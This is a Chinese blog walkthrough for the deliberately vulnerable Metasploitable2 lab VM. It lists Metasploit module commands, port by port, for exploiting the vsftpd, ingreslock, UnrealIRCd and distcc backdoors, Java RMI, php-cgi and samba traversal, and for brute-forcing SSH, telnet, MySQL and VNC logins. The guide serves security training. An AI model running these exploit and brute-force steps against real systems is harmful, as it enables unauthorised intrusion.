首页 > 编程语言 >Metasploit2通关教程

Metasploit2通关教程

时间:2023-01-31 22:23:46浏览次数:40  
标签:教程 Set Metasploit2 search 端口 use 192.168 28.141 通关

Metasploitable2靶机介绍:

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全新手学习

Metasploitable2靶机下载:

https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q
提取码:810r

Metasploitable2靶机安装:

下载好了把安装包解压 然后试用VMware即可。

Metasploitable2靶机漏洞详解:

渗透机:kali IP :192.168.28.128

靶机IP :192.168.28.141

漏洞清单:

21端口

search vsftpd
use 0
set rhosts 192.168.28.141
run

22端口==直接暴力破解

Search  ssh_login       搜索模块
Use  auxiliary/scanner/ssh/ssh_login    使用模块
Set  RHOST 192.168.28.141    设置目标地址
Set   USER_FILE  XXX   设置用户字典路径
Set   PASS_FILE  XXX   设置字典密码路径
Set   THREADS   100   设置线程是100
Run  

23端口(telnet):

search telnet_login
use 1
Set  RHOST 192.168.28.141    设置目标地址
Set   USER_FILE  XXX   设置用户字典路径
Set   PASS_FILE  XXX   设置字典密码路径
Set   THREADS   100   设置线程是100
Run  

80端口

拿到站点进行渗透老套路====信息搜集啥的

search php-cgi
use 0
set rhost 192.168.28.141
run
background====将shell后置后台

139端口,445端口

这两个都是smb类型的,是共享服务,首选我们需要知道它的共享目录有哪些,枚举之后可看到一共发现有5个如下

search smb_eumn
  	  0  auxiliary/scanner/smb/smb_enumshares
use 0
set rhost 192.168.28.141

在使用一个脚本:use auxiliary/admin/smb/samba_symlink_traversal

1099端口

一个Java反序列化命令执行漏洞,可以看到已经getshell

原理:Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致

search java rmi
		4   exploit/multi/misc/java_rmi_server  
use 4
set rhosts 192.168.28.141
run

1524端口ingreslock

在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。它的利用是如此简单。

telnet 192.168.28.141 1524

3306数据库默认端口

既然运行远程连接,直接爆破,账号root密码为空然后登入

使用模块:use auxiliary/scanner/mysql/mysql_login

search mysql_login
use 0
set username root

3632 distccd服务

远程命令执行漏洞,直接exp

使用模块:use exploit/unix/misc/distcc_exec

search distccd
use 0
set rhost 192.168.28.141

后面几个利用教程就不详细展开了!!!

5432端口

postgresq爆破

5900端口vnc服务

vnc服务有两部分构成,一部分是服务,一个是客户端,我们进行爆破

使用模块爆破:use auxiliary/scanner/vnc/vnc_login

6667端口

6697 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell

使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor

8180端口

暴力破解账号密码:tomcat;tomcat

8787端口drb服务

有个远程代码执行漏洞

使用模块:use exploit/linux/misc/drb_remote_codeexec

标签:教程,Set,Metasploit2,search,端口,use,192.168,28.141,通关
From: https://www.cnblogs.com/GLory-LTF/p/17081018.html

相关文章

  • python教程:shutil高级文件操作
    1、shutil高级文件操作模块shutil模块提供了大量的文件的高级操作。特别针对文件拷贝和删除,主要功能为目录和文件操作以及压缩操作。对单个文件的操作也可参见os模块。2......
  • macOS 系统修改语言教程简单设置系统语言为中文
    原文来源于黑果魏叔官网,转载需注明出处。​macOS 有时候安装更新完之后由于设置的问题可能会变成英文界面,那么可以安装下面教程来设置系统语言为中文语言。系统偏好设置1.......
  • 博客园主题美化DIY教程
    感想因为受到友人启发,部署了个静态页面,想着太单调了,要不连博客园的修一修,就去网上翻找了一下,果然给我发现了,但是在DIY的中途,遇到一大堆问题,因为是几年前的源码了,很多......
  • webpack教程
    安装webpack新建项目的目录,并将命令行切换到该目录下:mkdirwebpackdemo&&cdwebpackdemo初始化项目(我们自己开发的npm包,)npminit-y把webpack和webpack-cli安装到项目本地......
  • Python3网络爬虫教程7——SSL数字证书
    Python全栈工程师核心面试300问深入解析(2020版)----全文预览Python全栈工程师核心面试300问深入解析(2020版)----欢迎订阅上接:Python3网络爬虫教程6——cookie......
  • Python3网络爬虫教程6——cookie & session(cookie的属性,保存及模块的使用)
    Python全栈工程师核心面试300问深入解析(2020版)----全文预览Python全栈工程师核心面试300问深入解析(2020版)----欢迎订阅上接:Python3网络爬虫教程5——ProxyHa......
  • Python3网络爬虫教程5——ProxyHandler处理(代理服务器和代理IP)
    上接:Python3网络爬虫教程4——UserAgent的使用(用户伪装)(附常用的UserAgent值清单[3.ProxyHandler处理(代理服务器)使用代理IP,是爬虫的常用手段服务器有反爬虫手段,使用代......
  • Linux下安装docker教程
    2023新一年啦,今年准备项目部署换成docker,所以现在开始上手在本地部署,本篇文章就是单纯的记录下docker的部署过程,希望能帮助下有需要的人 据了解,docker从17.03版......
  • 下载相关-CH32系列芯片下载方式汇总及教程
    一、CH32Fx系列芯片下载1、ISP下载;2、SWD下载3、脱机烧录器下载;二、CH32Vx系列芯片下载1、ISP下载;2、SWD下载;3、脱机烧录器下载;4、CH32V003下载注意事项;  ......
  • Windows10中macOS10.14虚拟机性能优化教程
    ​​Python全栈工程师核心面试300问深入解析(2020版)----全文预览​​Windows10中采用VMware15安装安装macOS10.14教程虚拟机中masOS运行并不是完美流畅,需要进行性能......